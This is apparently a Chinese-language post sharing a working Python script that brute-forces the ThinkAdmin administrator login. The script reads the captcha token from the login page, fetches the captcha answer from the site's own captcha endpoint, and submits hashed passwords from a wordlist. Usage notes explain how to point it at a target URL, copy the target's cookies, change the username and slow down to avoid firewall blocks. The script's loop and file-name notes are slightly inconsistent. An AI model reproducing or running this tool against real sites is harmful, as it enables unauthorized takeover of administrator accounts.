ThinkAdmin 绕过验证码后台账号爆破脚本

ThinkAdmin 后台样式

爆破脚本代码

import requests
import hashlib
import json
import fileinput
from bs4 import BeautifulSoup

urls = "http://127.0.0.1:81"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36',
    'Cookie': 'sd9611012=udlbvtklamk6oil9mdfhqsr9au; thinkphp_show_page_trace=0|0; s3e5be473=vf1ljf9bg6rs9ngsc7lnhtlrc2'
}

def create_md5(pwd):
   md5_obj = hashlib.md5()
   md5_obj.update((pwd).encode("utf-8"))  
   return md5_obj.hexdigest()  

#获取data-captcha-token
def token():
    try:
        url = "%s/admin/login.html"%(urls)
        html = requests.get(url,headers=headers)
        soup = BeautifulSoup(html.text, "html.parser")
        token = soup.find('label', {'data-captcha-type': 'login_captcha'}).get('data-captcha-token')
        return token
    except:
        print('token请求失败')

#根据data-captcha-token 获取code和uniqid
def value():
    try:
        url = "%s/admin/login/captcha"%(urls)
        d = {'type': 'login_captcha', 'token': token()}
        html = requests.post(url, data=d,headers=headers)
        html = json.loads(html.text)
        uniqid = html['data']['uniqid']
        code = html['data']['code']
        return uniqid,code
    except:
        print('value请求失败')

#登陆请求
def login(pwd):
    try:
        url = "%s/admin/login.html"%(urls)
        uniqid,code = value()
        pwds = create_md5(pwd)+uniqid
        md5 = create_md5(pwds)
        d = {
            'username': 'admin', 
            'password': md5,
            'verify':code,
            'uniqid':uniqid
        }
        html = requests.post(url, data=d,headers=headers)
        html = json.loads(html.text)
        print("%s     密码：%s"%(html['info'],pwd))
    except:
        print('login请求失败')

with fileinput.input(files=(r'F:\back\pass\top1w.txt'),openhook=fileinput.hook_encoded("utf-8")) as f:
    try:
        count=0
        for line in f:
            count = count+1
            print("第 %s 次尝试"%(count))
            if login(line.replace("\n", "")) == '登录成功':
                break
    except:
        print('爆破结束')

使用须知

1. 密码字典放在脚本同目录下，命名：password.txt
2. 不同的站点，cookie 结构不同，请自行修改第十行 cookie 内容。（访问目标网站，然后复制浏览器中的全部 cookie 即可，这一步很重要，是根据 cookie 绕过验证码的）
3. 第 7 行填写目标 url 地址
4. 使用报错请自行安装 python 依赖库
5. 登陆用户名修改 43 行，默认 admin

成功截图

考虑到可能出现被防火墙拦截的情况，所以没有添加线程增加爆破速度。

如果出现防火墙拦截，自行加一个延迟即可